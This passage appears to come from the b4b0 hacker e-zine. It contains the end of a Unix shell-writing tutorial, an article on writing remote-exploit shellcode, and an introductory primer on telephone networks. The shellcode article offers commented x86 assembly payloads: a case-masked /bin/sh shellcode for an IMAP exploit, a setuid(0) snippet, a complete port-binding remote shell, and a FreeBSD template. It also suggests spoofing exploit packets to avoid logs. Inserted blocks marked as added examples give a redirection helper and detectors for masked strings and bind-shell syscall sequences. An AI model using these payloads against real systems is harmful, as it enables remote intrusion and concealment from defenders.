        if (fgets(input, MAX_CANON, stdin) == NULL)
            break;
        /* strip the trailing newline left by fgets() */
        if(*(input + strlen(input) - 1) == NEWLINE_SYMBOL)
            *(input + strlen(input) - 1) = 0;
        if(strcmp(input, QUIT_STRING) == 0)
            break;
        else {
            if ((child_pid = fork()) == 0) {
                execthecommand(input);
                exit(1);
            }
            else if(child_pid > 0)
                wait(NULL);
        }
    }
    exit(0);
}
------------------------------EOF-----------------------------------------
We made several changes to version 2 of our shell. Notice we used fputs()
instead of fprintf() for the command line. fputs() prints a defined string
a lot faster. Also, notice we did some more error checking in this version.
Also notice we now have the function execthecommand() to replace the
original execvp() and makeargv() calls. Control will never come back
from the function execthecommand(), so you shouldn't be having a problem
when you enter invalid commands.
Unix deals with input/output through file descriptors. A program has to
open a file or a device before it can access it. It will then access
the file using a handle that is returned by open() syscall. With
the support of re-direction, you can do stuff like this.
b4b0$ cat < input.txt > output.txt
That command redirects its standard input to 'input.txt' and its output
to 'output.txt'.
The following is a revised version of the execthecommand() function that
you can use to support redirection. I basically made execthecommand() parse
*incmd, which might contain redirection. It then calls redirect()
to perform the actual redirection, and makeargv() to create the command
array. It then execs the command.
-----------------------------execthecommand() v2.0 by ph1x--------------------
#include "b4b0shell.h"

void execthecommand(char *incmd)
{
    char **rargv;
    char *infile;
    char *outfile;

    /* pull "< file" and "> file" out of the command line first */
    if(parsefile(incmd, IN_REDIRECT_SYMBOL, &infile) == -1)
        printf("Incorrect input redirection\n");
    else if(parsefile(incmd, OUT_REDIRECT_SYMBOL, &outfile) == -1)
        printf("Incorrect output redirection\n");
    else if(redirect(infile, outfile) == -1)
        printf("redirection failed!@#$\n");
    /* what is left is the command itself */
    else if(makeargv(incmd, BLANK_STRING, &rargv) > 0) {
        if(execvp(rargv[0], rargv) == -1)
            printf("Invalid command\n");
    }
    exit(1);
}
--------------------------EOF---------------------------------------------
Change the execthecommand() in bsh v2.0 to the one I modified for
redirection support.
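One way the redirection step described above can be done, as an added example that is not the zine's own code: parse_redirect(), apply_redirect() and run_line() are hypothetical stand-ins for parsefile(), redirect() and execthecommand(), and the command line in main() is a constructed sample.

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical stand-in for parsefile(), written for this example.
 * Cuts "<sym> filename" out of cmd, blanking it so only the command words
 * remain. Returns 0 if sym is absent, 1 with *name set to a malloc'd copy of
 * the filename, or -1 if sym is there but no filename follows it. */
int parse_redirect(char *cmd, char sym, char **name)
{
    char *p = strchr(cmd, sym), *start, *end;
    size_t n;

    *name = NULL;
    if (p == NULL)
        return 0;
    start = p + 1 + strspn(p + 1, " \t");
    end = start + strcspn(start, " \t\n<>|&");
    n = (size_t)(end - start);
    if (n == 0 || (*name = malloc(n + 1)) == NULL)
        return -1;
    memcpy(*name, start, n);
    (*name)[n] = '\0';
    memset(p, ' ', (size_t)(end - p));
    return 1;
}

/* Make `target` refer to the file open on `fd`, then drop the spare fd. */
static int move_fd(int fd, int target)
{
    int rc;
    if (fd == target)           /* already in place; closing would undo it */
        return 0;
    rc = dup2(fd, target);
    close(fd);
    return rc == -1 ? -1 : 0;
}

/* Hypothetical stand-in for redirect(): point stdin/stdout at the named
 * files. NULL leaves that stream alone. Returns 0, or -1 on error. */
int apply_redirect(const char *infile, const char *outfile)
{
    int fd;

    if (infile != NULL) {
        fd = open(infile, O_RDONLY);
        if (fd == -1 || move_fd(fd, STDIN_FILENO) == -1)
            return -1;
    }
    if (outfile != NULL) {
        fd = open(outfile, O_WRONLY | O_CREAT | O_TRUNC, 0644);
        if (fd == -1 || move_fd(fd, STDOUT_FILENO) == -1)
            return -1;
    }
    return 0;
}

/* Fork, redirect in the child only, exec, and return the child's exit
 * status (126 = bad redirection, 127 = exec failed), or -1. */
int run_line(const char *line)
{
    char buf[512], *argv[32], *in = NULL, *out = NULL, *tok;
    int argc = 0, status;
    pid_t pid;

    if (strlen(line) >= sizeof buf)
        return -1;
    strcpy(buf, line);
    if ((pid = fork()) == -1)
        return -1;
    if (pid == 0) {
        if (parse_redirect(buf, '<', &in) == -1 ||
            parse_redirect(buf, '>', &out) == -1 ||
            apply_redirect(in, out) == -1)
            _exit(126);
        /* stand-in for makeargv(): split what is left on blanks */
        for (tok = strtok(buf, " \t\n"); tok != NULL && argc < 31;
             tok = strtok(NULL, " \t\n"))
            argv[argc++] = tok;
        argv[argc] = NULL;
        if (argc > 0)
            execvp(argv[0], argv);
        _exit(127);             /* never fall back into the shell loop */
    }
    if (waitpid(pid, &status, 0) == -1 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* constructed sample command line */
    printf("status %d\n", run_line("wc -c < /etc/hosts > /tmp/bsh_out.txt"));
    return 0;
}
```

The redirection is applied after fork(), so only the child's descriptors change and the shell keeps its own terminal.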
Let's take a look at our final shell.
--------------------------bsh v3.0--------------------------------------
#include "b4b0shell.h"

void execthecommand(char *incmd)
{
    char **rargv;
    char *infile;
    char *outfile;

    /* pull "< file" and "> file" out of the command line first */
    if(parsefile(incmd, IN_REDIRECT_SYMBOL, &infile) == -1)
        printf("Incorrect input redirection\n");
    else if(parsefile(incmd, OUT_REDIRECT_SYMBOL, &outfile) == -1)
        printf("Incorrect output redirection\n");
    else if(redirect(infile, outfile) == -1)
        printf("redirection failed!@#$\n");
    /* what is left is the command itself */
    else if(makeargv(incmd, BLANK_STRING, &rargv) > 0) {
        if(execvp(rargv[0], rargv) == -1)
            printf("Invalid command\n");
    }
    exit(1);
}

int main(void) {
    char input[MAX_CANON];
    pid_t child_pid;

    while(1) {
        fputs(PROMPT_STRING, stdout);
        if (fgets(input, MAX_CANON, stdin) == NULL)
            break;
        /* strip the trailing newline left by fgets() */
        if(*(input + strlen(input) - 1) == NEWLINE_SYMBOL)
            *(input + strlen(input) - 1) = 0;
        if(strcmp(input, QUIT_STRING) == 0)
            break;
        else {
            if ((child_pid = fork()) == 0) {
                execthecommand(input);
                exit(1);
            }
            else if(child_pid > 0)
                wait(NULL);
        }
    }
    exit(0);
}
------------------------------EOF--------------------------------------
Redirection is the last feature we are going to put in our shell.
Unfortunately, I was busy as hell getting b4b0 7 together, and I
didn't have much time to add support for pipes, background processes,
job control (allows a user to move the foreground process group into
the background, and vice versa), or most of the other things that
a good shell features. This was merely for your learning and enjoyment.
Hope you gained something out of it. Feel free to look up the functions
in b4b0shell.h that we didn't use, and extend your shell with them.
Bye. HEH!@#$
ph1x@b4b0.org
-------------------------------------------------------------------------------------
<!b4b0!b4b0!b4b0!b4b0!> The art of making shell code, by smiler. <!b4b0!b4b0!b4b0!b4b0!>
-------------------------------------------------------------------------------------
Hopefully you are familiar with generic shell-spawning shellcode. If not
read Aleph's text "Smashing The Stack For Fun And Profit" before
reading further. This article will concentrate on the types of shellcode
needed to exploit daemons remotely. Generally it is much harder to exploit
remote daemons, because you do not have many ways of finding out the
configuration of the remote server. Often the shellcode has to be much
more complicated, which is what this article will focus on.
I will start by looking at the ancient IMAP4 exploit. This is a fairly
simple exploit. All you need to do is "hide" the "/bin/sh" string in the
shellcode (imapd converts all lowercase characters into uppercase).
None of the instructions in the generic shell-spawning shellcode contain
lower-case characters, so all you need to do is change the /bin/sh
string.
It is the same as normal shellcode, except there is a loop which adds
0x20 to each byte in the "/bin/sh" string. I put in lots of comments so
even beginners can understand it. Sorry to all those asm virtuosos :]
-----imap.S-------
.globl main
main:
jmp call
start:
popl %ebx /* get address of /bin/sh */
movl %ebx,%ecx /* copy the address to ecx */
addb $0x6,%cl /* ecx now points to the last character */
loop:
cmpl %ebx,%ecx
jl skip /* if (ecx<ebx) goto skip */
addb $0x20,(%ecx) /* adds 0x20 to the byte pointed to by %ecx */
decb %cl /* move the pointer down by one */
jmp loop
skip:
/* generic shell-spawning code */
movl %ebx,0x8(%ebx)
xorl %eax,%eax
movb %eax,0x7(%ebx)
movl %eax,0xc(%ebx)
movb $0xb,%al
leal 0x8(%ebx),%ecx
leal 0xc(%ebx),%edx
int $0x80
xorl %eax,%eax
inc %al
int $0x80
call:
call start
.string "\x0f\x42\x49\x4e\x0f\x53\x48"
--------------
This was a very simple variation on the generic shellcode and can be
useful to mask characters that aren't allowed by the protocol the daemon
uses. But when coding remote, or even local, exploits you have to be
prepared to write code which is much more complex. This usually means
writing shellcode that involves different syscalls.
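Seen from the defending side, a constant shift like the one in imap.S is easy to search for, because a single key has to explain every byte of the hidden string. The scan below is an added example, not part of the original article; it also covers a single-byte XOR mask, which goes beyond the additive case in the text, and find_masked() and the sample buffers are constructed for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

enum mask_kind { MASK_NONE, MASK_ADD, MASK_XOR };

struct hit {
    size_t offset;         /* where the hidden string starts */
    enum mask_kind kind;   /* how a decoder would undo the mask */
    unsigned char key;     /* byte it adds (mod 256) or XORs in */
};

/* Look for `needle` in buf, either in the clear, with every byte shifted by
 * one constant (the imap.S trick), or XORed with one constant. The key is
 * derived from the first byte and must then explain all the others.
 * Stores up to `max` hits and returns how many were stored. */
size_t find_masked(const unsigned char *buf, size_t len, const char *needle,
                   struct hit *hits, size_t max)
{
    const unsigned char *want = (const unsigned char *)needle;
    size_t n = strlen(needle), i, j, found = 0;

    if (n < 4 || len < n)           /* short needles match by accident */
        return 0;
    for (i = 0; i + n <= len && found < max; i++) {
        unsigned char add = (unsigned char)(want[0] - buf[i]);
        unsigned char xr = (unsigned char)(want[0] ^ buf[i]);
        int add_ok = 1, xor_ok = 1;

        for (j = 1; j < n && (add_ok || xor_ok); j++) {
            if ((unsigned char)(buf[i + j] + add) != want[j])
                add_ok = 0;
            if ((unsigned char)(buf[i + j] ^ xr) != want[j])
                xor_ok = 0;
        }
        if (!add_ok && !xor_ok)
            continue;
        hits[found].offset = i;
        /* add and xor agree when no bit carries; report ADD in that case */
        hits[found].kind = add_ok ? (add ? MASK_ADD : MASK_NONE) : MASK_XOR;
        hits[found].key = add_ok ? add : xr;
        found++;
    }
    return found;
}

/* Constructed samples. The seven masked bytes in SAMPLE_SHIFTED are the
 * .string from imap.S; the filler around them is arbitrary. */
const unsigned char SAMPLE_SHIFTED[] = {
    'A', '0', '0', '1', ' ',
    0x0f, 0x42, 0x49, 0x4e, 0x0f, 0x53, 0x48, '\r', '\n'
};
const unsigned char SAMPLE_XORED[] = {      /* "/bin/sh" ^ 0x5a plus filler */
    0x00, 0x11, 0x75, 0x38, 0x33, 0x34, 0x75, 0x29, 0x32, 0x7f
};
const unsigned char SAMPLE_CLEAN[] = "A001 LOGIN alice secret\r\n";

int main(void)
{
    static const char *const names[] = { "plain", "add", "xor" };
    struct hit h[4];
    size_t i, n = find_masked(SAMPLE_SHIFTED, sizeof SAMPLE_SHIFTED,
                              "/bin/sh", h, 4);

    for (i = 0; i < n; i++)
        printf("offset %lu, mask %s, key 0x%02x\n",
               (unsigned long)h[i].offset, names[h[i].kind], h[i].key);
    return 0;
}
```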
Useful syscalls are:
setuid(): To regain dropped root privileges (e.g. wu-ftpd)
mkdir()/chdir()/chroot(): To drop back to root directory (e.g. wu-ftpd)
dup2(): To connect a tcp socket to the shell (e.g. BIND&rpc.mountd tcp-style )
open()/write(): To write to /etc/passwd (e.g. everything !)
socket(): To write connectionless shellcode, as explained later.
The actual syscall numbers can be found in <asm/unistd.h>
Most syscalls in linux x86 are done in the same way. The syscall number
is put into register %eax, and the arguments are put into %ebx,%ecx and
%edx respectively. In some cases, where there are more arguments than
registers it may be necessary to store the arguments in user memory and
store the address of the arguments in the register. Or, if an argument
is a string, you would have to store the string in user memory and pass
the address of string as the argument. As before, the syscall is called
by "int $0x80".
You can potentially use any syscall, but the ones mentioned above should
just about be the only ones you will ever need.
As an example, here's a little shellcode snippet from my wu-ftpd exploit
that should execute setuid(0).
Note: you should always zero a register before using it.
---setuid.S----
.globl main
main:
xorl %ebx,%ebx /* zero the %ebx register, i.e. the 1st argument */
movl %ebx,%eax /* zero out the %eax register */
movb $0x17,%al /* set the syscall number */
int $0x80 /* call the interrupt handler */
---------------
Port-Binding Shellcode
When you are exploiting a daemon remotely with generic shellcode, it is
necessary to have an active TCP connection to pipe the shell stdin/out/err
over. This is applicable to all the remote linux exploits I've seen so
far, and is the preferred method.
But it is possible that a new vulnerability may be found, in a daemon
that only offers a UDP service (SNMP for example). Or it may only be
possible to access the daemon via UDP because the TCP ports are
firewalled etc. Current linux remote vulnerabilities are exploitable
via UDP - BIND as well as all rpc services run both UDP and TCP
services. Also, if you send the exploit via UDP it is trivial to spoof the
attacking udp packet so that you do not appear in any logs =)
To exploit daemons via UDP you could write shellcode to modify the
password file or to perform some other cunning task, but an interactive
shell is much more elite =] Clearly it is not possible to fit a UDP pipe
into shellcode, you still need a TCP connection. So my idea was to write
shellcode that behaved like a very rudimentary backdoor, it binds to a
port and executes a shell when it receives a connection.
I know for a fact that I wasn't the first one to write this type of
shellcode, but no one has officially published it so...here goes.
A basic bindshell program(without the style) looks like this:
int main()
{
char *name[2];
int fd,fd2,fromlen;
struct sockaddr_in serv;
fd=socket(AF_INET,SOCK_STREAM,0);
serv.sin_addr.s_addr=0;
serv.sin_port=1234;
serv.sin_family=AF_INET;
bind(fd,(struct sockaddr *)&serv,16);
listen(fd,1);
fromlen=16; /*(sizeof(struct sockaddr)*/
fd2=accept(fd,(struct sockaddr *)&serv,&fromlen);
/* "connect" fd2 to stdin,stdout,stderr */
dup2(fd2,0);
dup2(fd2,1);
dup2(fd2,2);
name[0]="/bin/sh";
name[1]=NULL;
execve(name[0],name,NULL);
}
Obviously, this is going to require a lot more space than normal
shellcode, but it can be done in under 200 bytes and most buffers are
quite a bit larger than that.
There is a slight complication in writing this shellcode as socket
syscalls are done slightly differently than other syscalls, under linux.
Every socket call has the same syscall number, 0x66. To differentiate
between different socket calls, a subcode is put into the register %ebx.
These can be found in <linux/net.h>. The important ones being:
SYS_SOCKET 1
SYS_BIND 2
SYS_LISTEN 4
SYS_ACCEPT 5
We also need to know the values of the constants, and the exact
structure of sockaddr_in. Again these are in the linux include files.
AF_INET == 2
SOCK_STREAM == 1
struct sockaddr_in {
    short int sin_family;        /* 2 byte word, containing AF_INET */
    unsigned short int sin_port; /* 2 byte word, containing the port in network byte order */
    struct in_addr sin_addr;     /* 4 byte long, should be zeroed */
    unsigned char pad[8];        /* should be zero, but doesn't really matter */
};
Since there are only two registers left, the arguments must be placed
sequentially in user memory, and %ecx must contain the address of the
first. Hence we have to store the arguments at the end of the shellcode.
The first 12 bytes will contain the 3 long arguments, the next 16 will
contain the sockaddr_in structure and the final 4 will contain fromlen
for the accept() call. Finally the result from each syscall is held in
%eax.
So, without further ado, here is the portshell warez...
Again I've over-commented everything.
----portshell.S----
.globl main
main:
/* I had to put in a "bounce" in the middle of the code as the shellcode
* was too big. If I had made it jmp the entire shellcode, the instruction
* would have contained a null byte, so if anyone has a shorter version,
* please send me it.
*/
jmp bounce
start:
popl %esi
/* socket(2,1,0) */
xorl %eax,%eax
movl %eax,0x8(%esi) /* 3rd arg == 0 */
movl %eax,0xc(%esi) /* zero out sock.sin_family&sock.sin_port */
movl %eax,0x10(%esi) /* zero out sock.sin_addr */
incb %al
movl %eax,%ebx /* socket() subcode == 1 */
movl %eax,0x4(%esi) /* 2nd arg == 1 */
incb %al
movl %eax,(%esi) /* 1st arg == 2 */
movw %eax,0xc(%esi) /* sock.sin_family == 2 */
leal (%esi),%ecx /* load the address of the arguments into %ecx */
movb $0x66,%al /* set socket syscall number */
int $0x80
/* bind(fd,&sock,0x10) */
incb %bl /* bind() subcode == 2 */
movb %al,(%esi) /* 1st arg == fd (result from socket()) */
movl %ecx,0x4(%esi) /* copy address of arguments into 2nd arg */
addb $0xc,0x4(%esi) /* increase it by 12 bytes to point to sockaddr struct */
movb $0x10,0x8(%esi) /* 3rd arg == 0x10 */
movb $0x23,0xe(%esi) /* set sin.port */
movb $0x66,%al /* no need to set %ecx, it is already set */
int $0x80
/* listen(fd,2) */
movl %ebx,0x4(%esi) /* bind() subcode==2, move this to the 2nd arg */
incb %bl /* no need to set 1st arg, it is the same as bind() */
incb %bl /* listen() subcode == 4 */
movb $0x66,%al /* again, %ecx is already set */
int $0x80
/* fd2=accept(fd,&sock,&fromlen) */
incb %bl /* accept() subcode == 5 */
movl %ecx,0x4(%esi) /* copy address of arguments into 2nd arg */
addb $0xc,0x4(%esi) /* increase it by 12 bytes */
movl %ecx,0x4(%esi) /* copy address of arguments into 3rd arg */
addb $0x1c,0x4(%esi) /* increase it by 12+16 bytes */
movb $0x66,%al
int $0x80
/* KLUDGE */
jmp skippy
bounce:
jmp call
skippy:
/* dup2(fd2,0) dup2(fd2,1) dup2(fd2,2) */
movb %al,%bl /* move fd2 to 1st arg */
xorl %ecx,%ecx /* 2nd arg is 0 */
movb $0x3f,%al /* set dup2() syscall number */
int $0x80
incb %cl /* 2nd arg is 1 */
movb $0x3f,%al
int $0x80
incb %cl /* 2nd arg is 2 */
movb $0x3f,%al
int $0x80
/* execve("/bin/sh",["/bin/sh"],NULL) */
movl %esi,%ebx
addb $0x20,%ebx /* %ebx now points to "/bin/sh" */
xorl %eax,%eax
movl %ebx,0x8(%ebx)
movb %al,0x7(%ebx)
movl %eax,0xc(%ebx)
movb $0xb,%al
leal 0x8(%ebx),%ecx
leal 0xc(%ebx),%edx
int $0x80
/* exit(0) */
xorl %eax,%eax
movl %eax,%ebx
incb %al
int $0x80
call:
call start
.ascii "abcdabcdabcd""abcdefghabcdefgh""abcd""/bin/sh"
-----------------------------------------------------
Once you have sent the exploit, you only need to connect to port 8960, and
you have an interactive shell.
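For detection, the same call sequence can be recognised in a syscall trace using the numbers given above (0x66 with subcodes 1, 2, 4 and 5, then 0x3f three times and 0xb). This is an added example, not part of the original article: the trace line format, parse_ev(), scan_trace() and the sample records are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Linux/i386 numbers quoted in the article */
enum { NR_EXECVE = 0x0b, NR_DUP2 = 0x3f, NR_SOCKETCALL = 0x66 };
enum { SYS_SOCKET = 1, SYS_BIND = 2, SYS_LISTEN = 4, SYS_ACCEPT = 5 };

/* One traced call: nr = %eax on entry, a0 = %ebx, a1 = %ecx, ret = %eax on
 * return. The record and its text form are assumptions for this example. */
struct ev { int pid, nr; long a0, a1, ret; };
enum stage { ST_IDLE, ST_SOCKET, ST_BOUND, ST_LISTENING, ST_ACCEPTED };
struct track { int pid; enum stage st; long conn_fd; unsigned dup_mask; };

int parse_ev(const char *line, struct ev *e)
{
    return sscanf(line, "pid=%d nr=%i a0=%li a1=%li ret=%li",
                  &e->pid, &e->nr, &e->a0, &e->a1, &e->ret) == 5;
}

/* Advance one process; returns 1 when execve follows an accept()ed socket
 * that has been dup2()ed onto fds 0, 1 and 2. */
static int step(struct track *t, const struct ev *e)
{
    int hit = 0;

    if (e->ret < 0)                     /* failed calls change nothing */
        return 0;
    if (e->nr == NR_SOCKETCALL) {
        if (e->a0 == SYS_SOCKET && t->st == ST_IDLE)
            t->st = ST_SOCKET;
        else if (e->a0 == SYS_BIND && t->st == ST_SOCKET)
            t->st = ST_BOUND;
        else if (e->a0 == SYS_LISTEN && t->st == ST_BOUND)
            t->st = ST_LISTENING;
        else if (e->a0 == SYS_ACCEPT && t->st >= ST_LISTENING) {
            t->st = ST_ACCEPTED;
            t->conn_fd = e->ret;        /* accept() returns the new fd */
            t->dup_mask = 0;
        }
    } else if (e->nr == NR_DUP2 && t->st == ST_ACCEPTED) {
        if (e->a0 == t->conn_fd && e->a1 >= 0 && e->a1 <= 2)
            t->dup_mask |= 1u << e->a1;
    } else if (e->nr == NR_EXECVE) {
        hit = (t->st == ST_ACCEPTED && t->dup_mask == 7u);
        t->st = ST_IDLE;
        t->dup_mask = 0;
    }
    return hit;
}

static struct track *get_track(struct track *tab, size_t cap, int pid)
{
    size_t i;

    for (i = 0; i < cap; i++) {         /* pid 0 marks the first free slot */
        if (tab[i].pid == 0)
            tab[i].pid = pid;
        if (tab[i].pid == pid)
            return &tab[i];
    }
    return NULL;
}

/* Run every record through its process's state machine; stores up to max
 * flagged pids and returns how many were stored. */
size_t scan_trace(const char *const *lines, size_t n, int *pids, size_t max)
{
    struct track tab[16], *t;
    struct ev e;
    size_t i, hits = 0;

    memset(tab, 0, sizeof tab);
    for (i = 0; i < n; i++) {
        if (!parse_ev(lines[i], &e) || (t = get_track(tab, 16, e.pid)) == NULL)
            continue;
        if (step(t, &e) && hits < max)
            pids[hits++] = e.pid;
    }
    return hits;
}

/* Constructed trace: pid 412 is an ordinary server, pid 977 shows the
 * pattern. Pointer arguments are recorded as 0. */
static const char *const SAMPLE_TRACE[] = {
    "pid=412 nr=0x66 a0=1 a1=0 ret=3", "pid=412 nr=0x66 a0=2 a1=0 ret=0",
    "pid=412 nr=0x66 a0=4 a1=0 ret=0", "pid=977 nr=0x66 a0=1 a1=0 ret=5",
    "pid=977 nr=0x66 a0=2 a1=0 ret=0", "pid=412 nr=0x66 a0=5 a1=0 ret=4",
    "pid=977 nr=0x66 a0=4 a1=0 ret=0", "pid=977 nr=0x66 a0=5 a1=0 ret=6",
    "pid=977 nr=0x3f a0=6 a1=0 ret=0", "pid=977 nr=0x3f a0=6 a1=1 ret=1",
    "pid=977 nr=0x3f a0=6 a1=2 ret=2", "pid=977 nr=0x0b a0=0 a1=0 ret=0",
};

int main(void)
{
    int pids[8];
    size_t n = scan_trace(SAMPLE_TRACE,
                          sizeof SAMPLE_TRACE / sizeof SAMPLE_TRACE[0], pids, 8);

    printf("%lu flagged, first pid %d\n", (unsigned long)n, n ? pids[0] : -1);
    return 0;
}
```

Supervisors in the inetd style hand sockets to programs in a similar way, so a rule like this is normally scoped to daemons that are never expected to exec anything.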
----------------[ FreeBSD shellcode
Just in case all of that was old hat to you, I'll take a little
foray into the world of BSD x86 shellcode. FreeBSD shellcode is in most
ways completely different, primarily because syscalls are done by pushing
arguments onto the stack and using a far call. The syscall number
still goes in the %eax register however. OpenBSD is much the same but
it uses an interrupt for syscalls.
The main complication in writing shellcode for FreeBSD is in the far
call (instruction lcall 7,0) which contains 5 null bytes. Obviously
you would need to write some basic self-modifying shellcode. Since this is
going to be used in every syscall you make, it's best to put this into a
mini-function and call it whenever necessary. I wrote a little template
for this; it's easy enough to make it execute a shell or bind to a port.
Just in case you're wondering, the syscall for execve is 0x3b.
----fbsd.S----
.globl main
main:
jmp call
start:
/* Modify the ascii string so it becomes lcall 7,0 */
popl %esi
xorl %ebx,%ebx
movl %ebx,0x1(%esi) /* zeroed long word */
movb %bl,0x6(%esi) /* zeroed byte */
movl %esi,%ebx
addb $0x8,%bl /* ebx points to binsh */
jmp blah /* start the code */
call:
call start
syscall:
.ascii "\x9a\x01\x01\x01\x01\x07\x01" /* hidden lcall 7,0 */
ret
binsh:
.ascii "/bin/sh...."
blah:
/* put shellcode here */
call syscall
================================================================================
[The Telephone System/network part 1]
================================================================================
By - Pabell
THE TELEPHONE SYSTEM OR NETWORK
This paper was written mainly because of the lack of real information
kicking around on and off the net about phone systems and networks.
This is part one, of a two-part primer on phone systems. This is a
very introductory paper. I don't go into great detail, but cover the
basics and a first look at phone networks and systems.
If you really haven't been exposed to the telephony industry, this
paper may be ominous. For the purpose of this paper I have broken
the telephone network into three basic components.
1. THE CENTRAL SWITCHING MACHINE
2. THE OUTSIDE PLANT FACILITIES
3. THE INSIDE PLANT FACILITIES
In this paper we will look at each of the three sections.
Section three, the INSIDE PLANT FACILITIES, will be covered in detail
throughout. The CENTRAL SWITCHING MACHINE and the OUTSIDE PLANT
FACILITIES sections of the telephone network will be explained briefly
in general terms. Most of the parts of the telephone system or network
will already be familiar to you, even if you don't realize it. You have a
phone of some description in your home or office, which is part of
the INSIDE PLANT FACILITIES section of the telephone network.
The INSIDE PLANT FACILITIES consists of all the cable, hardware,
telephone sets or equipment in the building or between buildings on
the same piece of property. The part of the network, which connects
buildings of various shapes and descriptions together, is called THE
OUTSIDE PLANT FACILITIES. Poles and associated wires are the only
type of outside plant distribution system in use today.
The remaining part you may not know about, or at least think you don't
know about, is the Central Switching Machine. The basic telephone circuit
is a Two Wire Circuit, which connects every telephone set, through the
Outside Plant Facilities, to a Central Switch. This two-wire circuit is
usually referred to as a "pair". One wire of the pair is referred to
as the TIP and the other wire is the RING.
THE CENTRAL SWITCHING MACHINE
The CENTRAL SWITCHING MACHINE is similar to the hub of a wheel where all
the individual two wire circuits or spokes are connected. This may sound
pretty complicated, but it really isn't. The central switch monitors
your telephone circuit and gives you a dial tone when you lift the
telephone set off the cradle. Taking a telephone handset off the
cradle is referred to as going "off-hook". Off-hook is a very common
phrase, and you will hear it in later parts of this paper.
When you dial, the Central Switch registers the digits dialed,
and identifies the circuit of the party you are trying to reach. The
Central Switch then connects your two-wire circuit to the party you
dialed. The two telephone sets, which are connected together by the
Central Switch, are referred to as the "calling" and "called" parties.
The Central Switch then sends a ringing voltage out to the called party,
which rings the set bells to identify an incoming call.
When the called party goes off-hook, the Central Switch recognizes the
off-hook condition and stops sending the ringing voltage, and the two
parties then converse. When the calling party dials the number of a
telephone circuit which is already in use, or "busy", the Central
Switch recognizes the busy condition, and returns a busy tone to
the calling party.
So, as you can see, the Central Switch isn't really unfamiliar to you.
You have interacted with, and experienced, many of the operations it
performs. There are many types of Central Switching Machines in use
throughout the telephone industry today. Each switch has its advantages
and features; however, all systems provide the basic functions which were
briefly described.
To review, the main parts of the Telephone Network I have described so
far are:
1. THE CENTRAL SWITCHING MACHINE
2. THE OUTSIDE PLANT FACILITIES
3. THE INSIDE PLANT FACILITIES
Let's backtrack briefly to the Outside Plant Facilities section of the
network. Obviously, it would be too difficult to take each separate
two-wire circuit individually back to the Central Switch. Consequently,
numerous two-wire circuits or pairs from a common area are bound together
in a common covering, or sheath. These groups of pairs enclosed by a common
sheath are referred to as cable. The actual number of pairs in a cable,
or the size of the cable, can vary from one pair to hundreds of pairs,
depending upon how many circuits the cable must service. As was mentioned
previously, all the cables servicing locations leave the Central Switch in
different directions according to the route which will be the most cost
effective and can effectively service people in the area. The cables which
leave the Central Switch are very large, but as the cable goes along it is
continually decreasing in size, as smaller cables are dropped off at
locations where they are needed. The smaller cables branch out from the
main cables, and these cables again branch out to smaller cables until
every building and place is reached.
There are three basic types of outside plant facilities in use today,
which connect the Central Switch, ultimately, to your phone.
1. AERIAL CABLE
2. UNDERGROUND CABLE
3. FIBER OPTIC CABLE
Let's briefly look at each of the types of Outside Plant Facilities.
Aerial Cable
As the name aerial cable would indicate, the cable, and terminals are
supported above the ground on poles. The Aerial Cable distribution
system is probably the one you are most familiar with, since it was the
first system utilized across North America. The poles and wire are still
visible throughout this country today, and in many cases this is still the
most cost-effective method, where underground cabling is physically
impossible.
The diagram would be typical of a single line residential building
application of an Aerial Outside Plant System. You may see the term
"terminal" in the diagram. Terminals are simply access points placed at
convenient locations, on or between poles, along the cable route to permit
connections to selected pairs in the cable. For example, a cable
consisting of 100 pairs might have a terminal mounted on the pole to
allow a technician access to pairs 1-25. The next terminal would allow
access to pairs 24-40, and so on, until all the pairs have been used.
In this manner, the pair assigned to each building, at the Central Switch,
can be accessed at the closest terminal to that particular building.
The individual building's aerial "drop wire" is then connected to the
pair in that terminal.
Underground Cable
The underground cable distribution system is very similar in design to the
aerial cable system. I consider underground cable to be both DIRECT
BURIED CABLE and CABLE PLACED IN UNDERGROUND CONDUIT SYSTEMS.
As the title Direct Buried would indicate, the cable is placed into
the ground, with no protection other than the inherent protection
provided by the cable composition. Underground Conduit Systems
for cable, are used to provide an out of sight cable system and to
provide a means of adding to the existing cable as service demands
increase. Underground Conduit Systems also provide protection for
the cables since the cables are inside a pipe, which shields the cable.
The Underground Cable Distribution System is configured similarly to
the aerial cable, in that, cables leave a central point and continually
branch out to smaller cables until all the buildings etc. have been
accommodated.
The Underground System is connected to buildings in basically two ways:
PEDESTALS and ENCAPSULATION. Pedestals are simply terminals or access
points where building cabling can be connected to the cable from the
Central Switching Machine. There are many types, sizes, and shapes of
pedestals in use today.
The following diagram is a simplified depiction of the underground cable
(drop wire) from a building premise, which has been buried, to a pedestal
for connection.
Encapsulation is when the building's drop wire is permanently spliced into
the underground distribution system. This system is preferred in
situations where the visible pedestals are not appropriate, or possible.
Fiber Optic Transmission Systems
In the aerial and underground cable distribution systems looked at
earlier, a pair of copper wires is used to carry the electrical signals
generated by the transmitting building's phone to the switching machine,
and then ultimately to the receiver's phone. The mouthpiece (transmitter)
of the telephone converts the acoustic voice message into corresponding
electrical signals. The electrical signals are passed on to the receiver's
earpiece (receiver) where they are converted back to the original
acoustic voice message.
In certain cases now, it is becoming uneconomical to provide a pair of
wires from every customer phone to the central switch. Transmitting speech
and information via glass fibers instead of the conventional copper wire
methods previously described is becoming increasingly popular in high
traffic areas. The term "Fiber Optics" or "FOTS" is becoming more and
more prevalent in the communication industry. "FOTS" is the short term
for Fiber Optics Transmission System.
The development of FOTS technology has been increasing dramatically in
recent years. The transmitting building's phone still generates the same
electrical signals, but the signals are used to turn a light source on and
off. The light travels down the glass fibers where it is received and
converted back to electrical impulses, which are connected to the
receiving customer's two-wire copper pair.
To get a perspective of the comparison of a pair of copper wires to a pair
of glass fibers, consider the number of independent connections, which are
possible on each type of system.
* A pair of copper wires will provide two way communications for one conversation.
* A pair of glass fibers can provide up to 8000 independent connections.
The demands for more and more facilities to transmit and receive
information are increasing rapidly. The cost and limitations of
traditional means of linking areas together are becoming more apparent.
The normal cable distribution systems in use throughout the telephone
industry employ combinations of underground, aerial, and FOTS
distribution systems, to provide the most cost efficient, and effective
means of providing service.
There is your basic introduction to the telephone network or system.
As my series of phone networks goes on I will go into greater detail
and explain some of its more complex issues and attributes.
Pabell
pabell@comtech.ab.ca
